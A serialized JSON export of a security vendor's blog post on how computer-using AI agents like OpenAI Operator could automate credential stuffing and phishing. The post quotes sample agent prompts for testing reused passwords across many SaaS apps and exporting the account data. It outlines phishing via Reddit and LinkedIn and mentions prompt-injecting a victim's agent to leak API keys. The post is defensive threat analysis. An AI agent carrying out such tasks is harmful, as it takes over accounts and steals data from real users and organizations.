used",[],{},{"nodeType":173,"value":9534,"marks":143607,"data":143608},[],{},{"nodeType":186,"data":143610,"content":143611},{"uri":77513},[143612],{"nodeType":173,"value":143613,"marks":143614,"data":143615},"deploy mitigating controls like MFA",[],{},{"nodeType":173,"value":143617,"marks":143618,"data":143619}," to prevent exploitation with a vulnerable single factor. ",[],{},{"nodeType":231,"data":143621,"content":143622},{},[],{"nodeType":169,"data":143624,"content":143625},{},[143626],{"nodeType":173,"value":1422,"marks":143627,"data":143628},[],{},{"nodeType":178,"data":143630,"content":143631},{},[143632,143636,143643],{"nodeType":173,"value":143633,"marks":143634,"data":143635},"If you want to learn more about identity attacks and how to stop them, ",[],{},{"nodeType":186,"data":143637,"content":143638},{"uri":1469},[143639],{"nodeType":173,"value":88194,"marks":143640,"data":143642},[143641],{"type":194},{},{"nodeType":173,"value":1477,"marks":143644,"data":143645},[],{},{"nodeType":178,"data":143647,"content":143648},{},[143649,143653,143661],{"nodeType":173,"value":143650,"marks":143651,"data":143652},"And if you want to see more malicious use cases of Operator in action, ",[],{},{"nodeType":186,"data":143654,"content":143655},{"uri":142999},[143656],{"nodeType":173,"value":143657,"marks":143658,"data":143660},"check out this on-demand webinar. ",[143659],{"type":194},{},{"nodeType":173,"value":37,"marks":143662,"data":143663},[],{},{"nodeType":312,"data":143665,"content":143668},{"target":143666},{"sys":143667},{"id":138798,"type":317,"linkType":318},[],{"nodeType":178,"data":143670,"content":143671},{},[143672],{"nodeType":173,"value":37,"marks":143673,"data":143674},[],{},"How new AI agents will transform credential stuffing attacks","Credential stuffing attacks had a huge impact in 2024. But things could be dialled up even further with Computer-Using Agents like OpenAI Operator. ","how-new-ai-agents-will-transform-credential-stuffing-attacks",{"items":143679},[143680,143682],{"sys":143681,"name":505},{"id":504},{"sys":143683,"name":26137},{"id":26136},{"items":143685},[143686],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":143687},{"url":1496},{"__typename":1528,"sys":143689,"content":143691,"title":144306,"synopsis":144307,"hashTags":118,"publishedDate":144308,"slug":144309,"tagsCollection":144310,"authorsCollection":144316},{"id":143690},"SiALa9w13C6q3OzeTeUum",{"json":143692},{"nodeType":165,"data":143693,"content":143694},{},[143695,143702,143718,143725,143731,143738,143745,143748,143755,143762,143769,143792,143799,143815,143818,143825,143832,143855,143862,143869,143887,143893,143900,143919,143925,143932,143978,143986,143993,144005,144017,144024,144057,144064,144067,144074,144094,144101,144108,144115,144118,144125,144133,144140,144147,144210,144217,144224,144231,144264,144270,144277,144284,144290],{"nodeType":178,"data":143696,"content":143697},{},[143698],{"nodeType":173,"value":143699,"marks":143700,"data":143701},"Computer-Using Agents (CUAs) are a new type of AI agent that drives your browser/OS for you. With the research preview release of OpenAI Operator last week, it’s likely that we’ll be seeing a lot more of this technology in the future as OpenAI iterates and competitors launch their own versions. ",[],{},{"nodeType":178,"data":143703,"content":143704},{},[143705,143709,143714],{"nodeType":173,"value":143706,"marks":143707,"data":143708},"These models run on the same UI as the user sees, rather than using code or API based add-ons or tools (e.g. with access via API keys). In Operator’s case, the agent runs in its own browser, where it can navigate to and interact with webpages by typing, clicking, and scrolling. It effectively sees and interacts with pages as a human would, ",[],{},{"nodeType":173,"value":143710,"marks":143711,"data":143713},"using human (not machine) identities",[143712],{"type":370},{},{"nodeType":173,"value":143715,"marks":143716,"data":143717}," — taking actions on the web without requiring custom API integrations. ",[],{},{"nodeType":178,"data":143719,"content":143720},{},[143721],{"nodeType":173,"value":143722,"marks":143723,"data":143724},"This means that a user describes a task, and Operator performs it autonomously on their behalf. The examples provided by OpenAI are things like booking a dinner reservation or shopping for groceries — but naturally the potential use cases are much, much broader, especially in a work context.",[],{},{"nodeType":312,"data":143726,"content":143730},{"target":143727},{"sys":143728},{"id":143729,"type":317,"linkType":318},"5mWWi5mfqEcSQX12gOtyQm",[],{"nodeType":178,"data":143732,"content":143733},{},[143734],{"nodeType":173,"value":143735,"marks":143736,"data":143737},"Obviously the broad impact of this technology is almost impossible to predict this early in the game. But since we’re focussed on identity security at Push, we can at least describe some of the very predictable impacts in this area.",[],{},{"nodeType":178,"data":143739,"content":143740},{},[143741],{"nodeType":173,"value":143742,"marks":143743,"data":143744},"CUAs like Operator are essentially very flexible no-code automation platforms. This means that these tools (or future iterations of them) will enable low-cost, low-effort automation of common web tasks — the very tasks that app developers and vendors have worked hard to prevent from being automated — including those frequently performed by attackers.",[],{},{"nodeType":231,"data":143746,"content":143747},{},[],{"nodeType":169,"data":143749,"content":143750},{},[143751],{"nodeType":173,"value":143752,"marks":143753,"data":143754},"Why do CUAs stand to benefit attackers more than previous AI tools? ",[],{},{"nodeType":178,"data":143756,"content":143757},{},[143758],{"nodeType":173,"value":143759,"marks":143760,"data":143761},"Organizations have been concerned about the security and privacy implications of GenAI tools and platforms for a while now — mainly concerning the risk of inputting sensitive data into LLMs, and prompt injection attacks in which models can be tricked into disclosing internal data. ",[],{},{"nodeType":178,"data":143763,"content":143764},{},[143765],{"nodeType":173,"value":143766,"marks":143767,"data":143768},"But so far, the primary impact of GenAI on attacker capabilities specifically has been mainly limited to the use of LLMs for the creation of phishing emails and in AI-assisted malware development — no doubt significant, but not exactly transformative. And although the concept of an AI agent is nothing new, they haven’t been particularly common outside of research circles. ",[],{},{"nodeType":178,"data":143770,"content":143771},{},[143772,143776,143781,143784,143789],{"nodeType":173,"value":143773,"marks":143774,"data":143775},"CUAs, on the other hand, use LLMs trained using datasets which make them far more able to understand and interact with web pages. Coupled with what is essentially a production-grade integration between browser and LLM, and you have an agent that is able to understand and interact with websites to achieve an outcome, with minimal human input and oversight (as opposed to simply scraping the data) ",[],{},{"nodeType":173,"value":143777,"marks":143778,"data":143780},"with much the same behaviors and capabilities",[143779],{"type":370},{},{"nodeType":173,"value":3107,"marks":143782,"data":143783},[],{},{"nodeType":173,"value":143785,"marks":143786,"data":143788},"as a human operator.",[143787],{"type":370},{},{"nodeType":173,"value":10557,"marks":143790,"data":143791},[],{},{"nodeType":178,"data":143793,"content":143794},{},[143795],{"nodeType":173,"value":143796,"marks":143797,"data":143798},"By performing actions autonomously on the user’s behalf, it has a lot in common with a low/no-code automation platform like Zapier or Make.com — except it doesn’t perform actions via API, but by performing actions in the browser as a user would. Unlike no/low-code automations, it doesn’t need a strict or rigid step-by-step description of tasks that should be automated and can dynamically generate steps like a human does. ",[],{},{"nodeType":178,"data":143800,"content":143801},{},[143802,143806,143811],{"nodeType":173,"value":143803,"marks":143804,"data":143805},"None of this can’t be done using other automation tools, but it’s the difference between writing code to automate a task by hand and asking a human assistant to do something for you — ",[],{},{"nodeType":173,"value":143807,"marks":143808,"data":143810},"the effort required is reduced by orders of magnitude.",[143809],{"type":370},{},{"nodeType":173,"value":143812,"marks":143813,"data":143814}," This makes it both more flexible and accessible to a much wider range of users. ",[],{},{"nodeType":231,"data":143816,"content":143817},{},[],{"nodeType":169,"data":143819,"content":143820},{},[143821],{"nodeType":173,"value":143822,"marks":143823,"data":143824},"How can CUAs be abused by attackers?",[],{},{"nodeType":178,"data":143826,"content":143827},{},[143828],{"nodeType":173,"value":143829,"marks":143830,"data":143831},"There are two main groups of attack to be aware of:",[],{},{"nodeType":250,"data":143833,"content":143834},{},[143835,143845],{"nodeType":254,"data":143836,"content":143837},{},[143838],{"nodeType":178,"data":143839,"content":143840},{},[143841],{"nodeType":173,"value":143842,"marks":143843,"data":143844},"Attacks enabled by the technology (CUA)",[],{},{"nodeType":254,"data":143846,"content":143847},{},[143848],{"nodeType":178,"data":143849,"content":143850},{},[143851],{"nodeType":173,"value":143852,"marks":143853,"data":143854},"Attacks against specific CUA tools/implementations (e.g. Operator)",[],{},{"nodeType":178,"data":143856,"content":143857},{},[143858],{"nodeType":173,"value":143859,"marks":143860,"data":143861},"Because the answer to the latter question is subjective depending on the CUA being targeted (and Operator is still in its “research preview” release) we’ll focus on how attackers can potentially use CUAs for malicious purposes in general. ",[],{},{"nodeType":235,"data":143863,"content":143864},{},[143865],{"nodeType":173,"value":143866,"marks":143867,"data":143868},"How attackers can use their own CUAs to conduct AI-powered cyber attacks",[],{},{"nodeType":178,"data":143870,"content":143871},{},[143872,143876,143884],{"nodeType":173,"value":143873,"marks":143874,"data":143875},"The most obvious use-case for an attacker-controlled CUA is targeting internet-based app accounts. Most organizations are now using hundreds of apps, with thousands of sprawling identities (including both inside enterprise SSO connected accounts and local username & password logins) — ",[],{},{"nodeType":186,"data":143877,"content":143878},{"uri":4492},[143879],{"nodeType":173,"value":143880,"marks":143881,"data":143883},"many of which are highly vulnerable to even low-sophistication attack techniques",[143882],{"type":194},{},{"nodeType":173,"value":197,"marks":143885,"data":143886},[],{},{"nodeType":312,"data":143888,"content":143892},{"target":143889},{"sys":143890},{"id":143891,"type":317,"linkType":318},"7itjimRwqpkrCF7YRI8FTq",[],{"nodeType":178,"data":143894,"content":143895},{},[143896],{"nodeType":173,"value":143897,"marks":143898,"data":143899},"Previously, identity attacks against modern SaaS environments and the sprawl of apps and accounts required a lot of manual work to scale. Because web identities are implemented in mostly bespoke ways across thousands of sites (and they are constantly changing) attacks on them are challenging to automate. Further, the act of logging in using automated methods has been impacted by widespread bot protection — specifically to prevent malicious automation. ",[],{},{"nodeType":178,"data":143901,"content":143902},{},[143903,143907,143915],{"nodeType":173,"value":143904,"marks":143905,"data":143906},"So, attackers end up sending phishing links through email, and targeting only a few high value apps for cred stuffing — despite the availability of credentials online (which, ",[],{},{"nodeType":186,"data":143908,"content":143909},{"uri":819},[143910],{"nodeType":173,"value":143911,"marks":143912,"data":143914},"as the Snowflake attacks demonstrate",[143913],{"type":194},{},{"nodeType":173,"value":143916,"marks":143917,"data":143918},", can be an untapped treasure trove for attackers).",[],{},{"nodeType":312,"data":143920,"content":143924},{"target":143921},{"sys":143922},{"id":143923,"type":317,"linkType":318},"24HV5O6LJ12ZVECTSel2WL",[],{"nodeType":178,"data":143926,"content":143927},{},[143928],{"nodeType":173,"value":143929,"marks":143930,"data":143931},"We know that about 1 in 3 users re-use passwords, so there is a great chance a lot of those exact same credentials were actually valid for many other apps. It’s very tough to manually test each credential by logging into even a few dozen apps (or building a web automation to do so). But this is significantly easier if you can ask a CUA to: ",[],{},{"nodeType":250,"data":143933,"content":143934},{},[143935,143945,143955],{"nodeType":254,"data":143936,"content":143937},{},[143938],{"nodeType":178,"data":143939,"content":143940},{},[143941],{"nodeType":173,"value":143942,"marks":143943,"data":143944},"“Find a list of the top 1000 SaaS apps”. ",[],{},{"nodeType":254,"data":143946,"content":143947},{},[143948],{"nodeType":178,"data":143949,"content":143950},{},[143951],{"nodeType":173,"value":143952,"marks":143953,"data":143954},"“Try to login to the app using this username and password. Let me know which apps you successfully logged into”. ",[],{},{"nodeType":254,"data":143956,"content":143957},{},[143958],{"nodeType":178,"data":143959,"content":143960},{},[143961,143965,143974],{"nodeType":173,"value":143962,"marks":143963,"data":143964},"“Use ",[],{},{"nodeType":186,"data":143966,"content":143968},{"uri":143967},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/takeout_services/description.md",[143969],{"nodeType":173,"value":143970,"marks":143971,"data":143973},"takeout services",[143972],{"type":194},{},{"nodeType":173,"value":143975,"marks":143976,"data":143977}," to download data from each app and send it to this location, grouping by company name” (or even just ask the model to cut and paste or download the data from the account).",[],{},{"nodeType":178,"data":143979,"content":143980},{},[143981],{"nodeType":173,"value":143982,"marks":143983,"data":143985},"This is how you really scale these attacks.",[143984],{"type":370},{},{"nodeType":178,"data":143987,"content":143988},{},[143989],{"nodeType":173,"value":143990,"marks":143991,"data":143992},"CUA agents also change how and where phishing can take place. Where phishing takes place outside of email, it’s much less likely to be intercepted by enterprise anti-phishing controls. You could:",[],{},{"nodeType":178,"data":143994,"content":143995},{},[143996,144001],{"nodeType":173,"value":143997,"marks":143998,"data":144000},"1.",[143999],{"type":370},{},{"nodeType":173,"value":144002,"marks":144003,"data":144004}," Task an agent to create Reddit, Discord, and Slack accounts, login, and find the 100 (or 10000?) biggest subreddits/communities/channels. Now have it join those, and write posts that seem relevant to ongoing threads, or write targeted DMs and include links to a phishing page. If the account gets banned, no problem, automatically start over. Not enough karma? Instruct the agent to build karma.",[],{},{"nodeType":178,"data":144006,"content":144007},{},[144008,144013],{"nodeType":173,"value":144009,"marks":144010,"data":144012},"2.",[144011],{"type":370},{},{"nodeType":173,"value":144014,"marks":144015,"data":144016}," Or consider a more targeted scenario: connect to a specific target (or group of targets) via LinkedIn, read all your target’s posts and comments, and using that context start a conversation with them, using a topic you know that will interest them to create a phishing lure, and direct them to your phishing site. ",[],{},{"nodeType":235,"data":144018,"content":144019},{},[144020],{"nodeType":173,"value":144021,"marks":144022,"data":144023},"Operator caveats",[],{},{"nodeType":178,"data":144025,"content":144026},{},[144027,144031,144040,144044,144053],{"nodeType":173,"value":144028,"marks":144029,"data":144030},"Now, it’s worth pointing out that Operator has controls that are designed to prevent this sort of abuse. ",[],{},{"nodeType":186,"data":144032,"content":144034},{"uri":144033},"https://openai.com/index/introducing-operator/",[144035],{"nodeType":173,"value":144036,"marks":144037,"data":144039},"For example",[144038],{"type":194},{},{"nodeType":173,"value":144041,"marks":144042,"data":144043},", Operator is trained to proactively ask the user to take over for tasks that require login, payment details, or when solving CAPTCHAs. The ",[],{},{"nodeType":186,"data":144045,"content":144047},{"uri":144046},"https://openai.com/index/operator-system-card/",[144048],{"nodeType":173,"value":144049,"marks":144050,"data":144052},"Operator System Card",[144051],{"type":194},{},{"nodeType":173,"value":144054,"marks":144055,"data":144056}," also cites proactive refusals of high-risk tasks, confirmation prompts before critical actions, and active monitoring systems to detect and mitigate potential threats.",[],{},{"nodeType":178,"data":144058,"content":144059},{},[144060],{"nodeType":173,"value":144061,"marks":144062,"data":144063},"It’s unclear at this point how resistant Operator will be to attack or abuse, but really, as we said earlier, this is not about Operator — once CUA tech becomes more widely available (if recent trends are anything to go by) there’s no doubt that models will emerge with fewer (or no) safety controls. ",[],{},{"nodeType":231,"data":144065,"content":144066},{},[],{"nodeType":169,"data":144068,"content":144069},{},[144070],{"nodeType":173,"value":144071,"marks":144072,"data":144073},"Why CUA-based automation is a problem for security teams",[],{},{"nodeType":178,"data":144075,"content":144076},{},[144077,144081,144090],{"nodeType":173,"value":144078,"marks":144079,"data":144080},"Attackers have been using automation tools forever, and in response, developers have been building protections against them (e.g. Cloudflare Turnstile and CAPTCHAs). Using LLMs to super power them isn’t even new, nor is using automation apps for malicious purposes (see our SaaS attack matrix entry for ",[],{},{"nodeType":186,"data":144082,"content":144084},{"uri":144083},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/shadow_workflows/description.md",[144085],{"nodeType":173,"value":144086,"marks":144087,"data":144089},"shadow workflows",[144088],{"type":194},{},{"nodeType":173,"value":144091,"marks":144092,"data":144093},") — so what’s the difference?",[],{},{"nodeType":178,"data":144095,"content":144096},{},[144097],{"nodeType":173,"value":144098,"marks":144099,"data":144100},"Previously, attackers needed to tie together automated browsers, get bot protection bypasses working, write code to extract screenshots from these browsers, pump those screenshots into a traditional LLM, generate response actions, and write code to execute those actions using browser automation. It was a lot of manual work — and needed constant maintenance — and wasn’t very effective because the general LLMs weren’t good at interpreting what they were seeing.",[],{},{"nodeType":178,"data":144102,"content":144103},{},[144104],{"nodeType":173,"value":144105,"marks":144106,"data":144107},"So, this isn’t so much a change in capability but a signal that there is going to be a massive increase in performance compared to other AI agents. Bundle the new model’s ability to understand with the ability to interact with webpages and you have something that might soon create real world impact at scale. ",[],{},{"nodeType":178,"data":144109,"content":144110},{},[144111],{"nodeType":173,"value":144112,"marks":144113,"data":144114},"Perhaps the only real obstacles are safety controls and cost. But as we’ve seen after previous GenAI launches, most recently with DeepSeek — competitors have been fast following with models that out-perform the original. Some of these models will be open and contain far fewer safety protections. An open CUA model in the future might be the trigger that enables attackers to leverage these capabilities at scale. ",[],{},{"nodeType":231,"data":144116,"content":144117},{},[],{"nodeType":169,"data":144119,"content":144120},{},[144121],{"nodeType":173,"value":144122,"marks":144123,"data":144124},"So what?",[],{},{"nodeType":178,"data":144126,"content":144127},{},[144128],{"nodeType":173,"value":144129,"marks":144130,"data":144132},"The TL;DR is that the adoption of CUAs has the potential to significantly lower the cost to attackers of running identity attacks such as phishing and credential stuffing, while increasing their reach.",[144131],{"type":370},{},{"nodeType":178,"data":144134,"content":144135},{},[144136],{"nodeType":173,"value":144137,"marks":144138,"data":144139},"We can expect improved account takeover attacks in the future as this technology becomes more widespread, with phishing attacks being increasingly delivered outside of traditional (well-protected) mediums like email, and credential stuffing being weaponized on an even more widespread scale, across a broader range of apps. These capabilities will also become more accessible, with even less advanced attackers able to harness them.",[],{},{"nodeType":178,"data":144141,"content":144142},{},[144143],{"nodeType":173,"value":144144,"marks":144145,"data":144146},"Right now, Operator runs in a sandboxed browser environment. But going forward, more value will require an increased ability to perform authenticated access as the user — so one could imagine a world where new features are built to expose passwords into this sandbox — or that these agents will be enabled outside these sandboxes and operate in your browser (primarily) or directly on your OS using agents. We’ve already seen these agents implemented as browser extensions. This makes sense as extensions can see the tab, and interact with the page — and some early extension-based agents have existed for a while:",[],{},{"nodeType":250,"data":144148,"content":144149},{},[144150,144170,144190],{"nodeType":254,"data":144151,"content":144152},{},[144153],{"nodeType":178,"data":144154,"content":144155},{},[144156,144159,144167],{"nodeType":173,"value":37,"marks":144157,"data":144158},[],{},{"nodeType":186,"data":144160,"content":144162},{"uri":144161},"https://github.com/richardyc/Chrome-GPT",[144163],{"nodeType":173,"value":144161,"marks":144164,"data":144166},[144165],{"type":194},{},{"nodeType":173,"value":10557,"marks":144168,"data":144169},[],{},{"nodeType":254,"data":144171,"content":144172},{},[144173],{"nodeType":178,"data":144174,"content":144175},{},[144176,144179,144187],{"nodeType":173,"value":37,"marks":144177,"data":144178},[],{},{"nodeType":186,"data":144180,"content":144182},{"uri":144181},"https://github.com/handrew/browserpilot",[144183],{"nodeType":173,"value":144181,"marks":144184,"data":144186},[144185],{"type":194},{},{"nodeType":173,"value":37,"marks":144188,"data":144189},[],{},{"nodeType":254,"data":144191,"content":144192},{},[144193],{"nodeType":178,"data":144194,"content":144195},{},[144196,144199,144207],{"nodeType":173,"value":37,"marks":144197,"data":144198},[],{},{"nodeType":186,"data":144200,"content":144202},{"uri":144201},"https://github.com/TaxyAI/browser-extension",[144203],{"nodeType":173,"value":144201,"marks":144204,"data":144206},[144205],{"type":194},{},{"nodeType":173,"value":1477,"marks":144208,"data":144209},[],{},{"nodeType":178,"data":144211,"content":144212},{},[144213],{"nodeType":173,"value":144214,"marks":144215,"data":144216},"If we have agents operating on user endpoints, not in sandboxes, that means they will have access to all identities that are already authenticated, or that can be automatically authenticated (password manager autofills etc.). There’s nothing fundamentally stopping you from prompt-injecting a victim's CUA and tricking it into creating a malicious integration, or sending you an API key.",[],{},{"nodeType":235,"data":144218,"content":144219},{},[144220],{"nodeType":173,"value":144221,"marks":144222,"data":144223},"So to summarize...",[],{},{"nodeType":178,"data":144225,"content":144226},{},[144227],{"nodeType":173,"value":144228,"marks":144229,"data":144230},"Organizations should anticipate an increase in identity attacks targeting web-based apps and services using techniques that can be amplified by CUAs such as phishing and credential stuffing. We recommend that organizations:",[],{},{"nodeType":250,"data":144232,"content":144233},{},[144234,144244,144254],{"nodeType":254,"data":144235,"content":144236},{},[144237],{"nodeType":178,"data":144238,"content":144239},{},[144240],{"nodeType":173,"value":144241,"marks":144242,"data":144243},"Anticipate an increase in phishing attacks delivered outside of email, and evaluate your detection capabilities for mediums such as IM platforms and social media sites.",[],{},{"nodeType":254,"data":144245,"content":144246},{},[144247],{"nodeType":178,"data":144248,"content":144249},{},[144250],{"nodeType":173,"value":144251,"marks":144252,"data":144253},"Find and harden identities that could be vulnerable to attacks using techniques that can be automated (e.g. mass credential stuffing) such as those missing phishing resistant MFA (or MFA altogether).",[],{},{"nodeType":254,"data":144255,"content":144256},{},[144257],{"nodeType":178,"data":144258,"content":144259},{},[144260],{"nodeType":173,"value":144261,"marks":144262,"data":144263},"Ensure that all identities are suitably protected — even those outside the scope of traditional identity stores (such as Active Directory and modern equivalents e.g. Entra, Okta) used to access the much broader set of web-based services. ",[],{},{"nodeType":235,"data":144265,"content":144266},{},[144267],{"nodeType":173,"value":1422,"marks":144268,"data":144269},[],{},{"nodeType":178,"data":144271,"content":144272},{},[144273],{"nodeType":173,"value":144274,"marks":144275,"data":144276},"AI-powered or not, identity attacks are what Push is designed to combat. Our features and controls designed to stop account takeover via phishing, credential stuffing, and session hijacking remain effective in this new world — in fact, as attackers are granted the ability to conduct these attacks with greater speed and scale, they become more valuable than ever. ",[],{},{"nodeType":178,"data":144278,"content":144279},{},[144280],{"nodeType":173,"value":144281,"marks":144282,"data":144283},"If you're interested in learning more, check out our on-demand webinar where we demonstrate the use of CUAs for automating identity attacks, particularly in the context of SaaS account takeover. ",[],{},{"nodeType":312,"data":144285,"content":144289},{"target":144286},{"sys":144287},{"id":144288,"type":317,"linkType":318},"UCmd5kqVZ03ce5Cs9M0r5",[],{"nodeType":178,"data":144291,"content":144292},{},[144293,144297,144303],{"nodeType":173,"value":144294,"marks":144295,"data":144296},"If you’d like to learn more about Push, ",[],{},{"nodeType":186,"data":144298,"content":144299},{"uri":473},[144300],{"nodeType":173,"value":126601,"marks":144301,"data":144302},[],{},{"nodeType":173,"value":126605,"marks":144304,"data":144305},[],{},"Considering the security implications of Computer-Using Agents (like OpenAI Operator)","CUAs are a new type of AI agent that drives your browser/OS for you, enabling effortless automation of web tasks — including those performed by attackers.","2025-01-28T00:00:00.000Z","considering-the-impact-of-computer-using-agents",{"items":144311},[144312,144314],{"sys":144313,"name":505},{"id":504},{"sys":144315,"name":26137},{"id":26136},{"items":144317},[144318],{"fullName":13977,"firstName":13978,"jobTitle":13979,"profilePicture":144319},{"url":13981},{"__typename":1528,"sys":144321,"content":144322,"title":126606,"synopsis":126607,"hashTags":118,"publishedDate":71823,"slug":126608,"tagsCollection":145325,"authorsCollection":145331},{"id":125444},{"json":144323},{"data":144324,"content":144325,"nodeType":165},{},[144326,144332,144379,144385,144388,144394,144400,144426,144436,144439,144445,144455,144461,144477,144482,144498,144504,144514,144531,144547,144553,144569,144574,144590,144593,144599,144606,144612,144628,144644,144650,144666,144672,144679,144700,144706,144722,144739,144744,144750,144766,144769,144775,144791,144807,144813,144861,144867,144870,144876,144883,144899,144915,144921,144928,144934,144951,144957,144963,144968,144973,144976,144982,144989,144995,145011,145020,145036,145042,145048,145057,145064,145070,145087,145092,145095,145101,145107,145113,145174,145180,145186,145192,145199,145216,145222,145227,145237,145254,145260,145267,145284,145290,145296,145301,145304,145310],{"data":144327,"content":144328,"nodeType":178},{},[144329],{"data":144330,"marks":144331,"value":125455,"nodeType":173},{},[],{"data":144333,"content":144334,"nodeType":250},{},[144335,144351,144360],{"data":144336,"content":144337,"nodeType":254},{},[144338],{"data":144339,"content":144340,"nodeType":178},{},[144341,144344,144348],{"data":144342,"marks":144343,"value":125468,"nodeType":173},{},[],{"data":144345,"marks":144346,"value":125473,"nodeType":173},{},[144347],{"type":1646},{"data":144349,"marks":144350,"value":125477,"nodeType":173},{},[],{"data":144352,"content":144353,"nodeType":254},{},[144354],{"data":144355,"content":144356,"nodeType":178},{},[144357],{"data":144358,"marks":144359,"value":125487,"nodeType":173},{},[],{"data":144361,"content":144362,"nodeType":254},{},[144363],{"data":144364,"content":144365,"nodeType":178},{},[144366,144369,144376],{"data":144367,"marks":144368,"value":125497,"nodeType":173},{},[],{"data":144370,"content":144371,"nodeType":186},{"uri":125500},[144372],{"data":144373,"marks":144374,"value":125506,"nodeType":173},{},[144375],{"type":194},{"data":144377,"marks":144378,"value":125510,"nodeType":173},{},[],{"data":144380,"content":144381,"nodeType":178},{},[144382],{"data":144383,"marks":144384,"value":125517,"nodeType":173},{},[],{"data":144386,"content":144387,"nodeType":231},{},[],{"data":144389,"content":144390,"nodeType":169},{},[144391],{"data":144392,"marks":144393,"value":125527,"nodeType":173},{},[],{"data":144395,"content":144396,"nodeType":178},{},[144397],{"data":144398,"marks":144399,"value":125534,"nodeType":173},{},[],{"data":144401,"content":144402,"nodeType":178},{},[144403,144406,144413,144416,144423],{"data":144404,"marks":144405,"value":125541,"nodeType":173},{},[],{"data":144407,"content":144408,"nodeType":186},{"uri":125544},[144409],{"data":144410,"marks":144411,"value":125550,"nodeType":173},{},[144412],{"type":194},{"data":144414,"marks":144415,"value":125554,"nodeType":173},{},[],{"data":144417,"content":144418,"nodeType":186},{"uri":125557},[144419],{"data":144420,"marks":144421,"value":125563,"nodeType":173},{},[144422],{"type":194},{"data":144424,"marks":144425,"value":125567,"nodeType":173},{},[],{"data":144427,"content":144428,"nodeType":178},{},[144429,144432],{"data":144430,"marks":144431,"value":125574,"nodeType":173},{},[],{"data":144433,"marks":144434,"value":125579,"nodeType":173},{},[144435],{"type":370},{"data":144437,"content":144438,"nodeType":231},{},[],{"data":144440,"content":144441,"nodeType":169},{},[144442],{"data":144443,"marks":144444,"value":125589,"nodeType":173},{},[],{"data":144446,"content":144447,"nodeType":235},{},[144448,144452],{"data":144449,"marks":144450,"value":77025,"nodeType":173},{},[144451],{"type":370},{"data":144453,"marks":144454,"value":3107,"nodeType":173},{},[],{"data":144456,"content":144457,"nodeType":178},{},[144458],{"data":144459,"marks":144460,"value":125606,"nodeType":173},{},[],{"data":144462,"content":144463,"nodeType":178},{},[144464,144467,144474],{"data":144465,"marks":144466,"value":125613,"nodeType":173},{},[],{"data":144468,"content":144469,"nodeType":186},{"uri":40823},[144470],{"data":144471,"marks":144472,"value":125621,"nodeType":173},{},[144473],{"type":194},{"data":144475,"marks":144476,"value":125625,"nodeType":173},{},[],{"data":144478,"content":144481,"nodeType":312},{"target":144479},{"sys":144480},{"id":125630,"type":317,"linkType":318},[],{"data":144483,"content":144484,"nodeType":178},{},[144485,144488,144495],{"data":144486,"marks":144487,"value":125638,"nodeType":173},{},[],{"data":144489,"content":144490,"nodeType":186},{"uri":111565},[144491],{"data":144492,"marks":144493,"value":125646,"nodeType":173},{},[144494],{"type":194},{"data":144496,"marks":144497,"value":125650,"nodeType":173},{},[],{"data":144499,"content":144500,"nodeType":178},{},[144501],{"data":144502,"marks":144503,"value":125657,"nodeType":173},{},[],{"data":144505,"content":144506,"nodeType":235},{},[144507,144511],{"data":144508,"marks":144509,"value":24287,"nodeType":173},{},[144510],{"type":370},{"data":144512,"marks":144513,"value":3107,"nodeType":173},{},[],{"data":144515,"content":144516,"nodeType":178},{},[144517,144520,144528],{"data":144518,"marks":144519,"value":125674,"nodeType":173},{},[],{"data":144521,"content":144522,"nodeType":186},{"uri":9099},[144523],{"data":144524,"marks":144525,"value":125683,"nodeType":173},{},[144526,144527],{"type":194},{"type":370},{"data":144529,"marks":144530,"value":125687,"nodeType":173},{},[],{"data":144532,"content":144533,"nodeType":178},{},[144534,144537,144544],{"data":144535,"marks":144536,"value":125694,"nodeType":173},{},[],{"data":144538,"content":144539,"nodeType":186},{"uri":125697},[144540],{"data":144541,"marks":144542,"value":125703,"nodeType":173},{},[144543],{"type":194},{"data":144545,"marks":144546,"value":125707,"nodeType":173},{},[],{"data":144548,"content":144549,"nodeType":178},{},[144550],{"data":144551,"marks":144552,"value":125714,"nodeType":173},{},[],{"data":144554,"content":144555,"nodeType":178},{},[144556,144559,144566],{"data":144557,"marks":144558,"value":125721,"nodeType":173},{},[],{"data":144560,"content":144561,"nodeType":186},{"uri":4492},[144562],{"data":144563,"marks":144564,"value":125729,"nodeType":173},{},[144565],{"type":194},{"data":144567,"marks":144568,"value":125733,"nodeType":173},{},[],{"data":144570,"content":144573,"nodeType":312},{"target":144571},{"sys":144572},{"id":125738,"type":317,"linkType":318},[],{"data":144575,"content":144576,"nodeType":178},{},[144577,144580,144587],{"data":144578,"marks":144579,"value":125746,"nodeType":173},{},[],{"data":144581,"content":144582,"nodeType":186},{"uri":125749},[144583],{"data":144584,"marks":144585,"value":125755,"nodeType":173},{},[144586],{"type":194},{"data":144588,"marks":144589,"value":125759,"nodeType":173},{},[],{"data":144591,"content":144592,"nodeType":231},{},[],{"data":144594,"content":144595,"nodeType":169},{},[144596],{"data":144597,"marks":144598,"value":125769,"nodeType":173},{},[],{"data":144600,"content":144601,"nodeType":235},{},[144602],{"data":144603,"marks":144604,"value":77025,"nodeType":173},{},[144605],{"type":370},{"data":144607,"content":144608,"nodeType":178},{},[144609],{"data":144610,"marks":144611,"value":125783,"nodeType":173},{},[],{"data":144613,"content":144614,"nodeType":178},{},[144615,144618,144625],{"data":144616,"marks":144617,"value":125790,"nodeType":173},{},[],{"data":144619,"content":144620,"nodeType":186},{"uri":49844},[144621],{"data":144622,"marks":144623,"value":125798,"nodeType":173},{},[144624],{"type":194},{"data":144626,"marks":144627,"value":125802,"nodeType":173},{},[],{"data":144629,"content":144630,"nodeType":178},{},[144631,144634,144641],{"data":144632,"marks":144633,"value":125809,"nodeType":173},{},[],{"data":144635,"content":144636,"nodeType":186},{"uri":125812},[144637],{"data":144638,"marks":144639,"value":1255,"nodeType":173},{},[144640],{"type":194},{"data":144642,"marks":144643,"value":53584,"nodeType":173},{},[],{"data":144645,"content":144646,"nodeType":178},{},[144647],{"data":144648,"marks":144649,"value":125827,"nodeType":173},{},[],{"data":144651,"content":144652,"nodeType":178},{},[144653,144656,144663],{"data":144654,"marks":144655,"value":125834,"nodeType":173},{},[],{"data":144657,"content":144658,"nodeType":186},{"uri":74693},[144659],{"data":144660,"marks":144661,"value":125842,"nodeType":173},{},[144662],{"type":194},{"data":144664,"marks":144665,"value":125846,"nodeType":173},{},[],{"data":144667,"content":144668,"nodeType":178},{},[144669],{"data":144670,"marks":144671,"value":125853,"nodeType":173},{},[],{"data":144673,"content":144674,"nodeType":235}